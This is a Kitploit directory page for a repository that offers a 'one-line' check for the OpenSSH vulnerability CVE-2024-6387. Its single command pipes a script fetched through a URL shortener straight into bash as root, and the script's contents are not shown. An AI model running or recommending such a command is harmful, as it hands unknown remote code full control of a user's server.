Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2024-6387 — One-line bash script to check if a server is vulnerable to CVE-2024-6387, using curl to fetch and execute a remote check script. | Kitploit
Tools/GitHubGitHub/ahlfors/cve-2024-6387
ReconnaissanceVulnerability ScannersExploitationInformation GatheringPenetration Testing
GitHubahlfors/cve-2024-6387

CVE-2024-6387

One-line bash script to check if a server is vulnerable to CVE-2024-6387, using curl to fetch and execute a remote check script.

View Repository
232 years agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2024-6387

check if your server exist CVE-2024-6387 by below one line bash script:

root@kitploit:~
curl -fsSL https://dub.sh/cve-2024-6387-CN |bash
Download Tool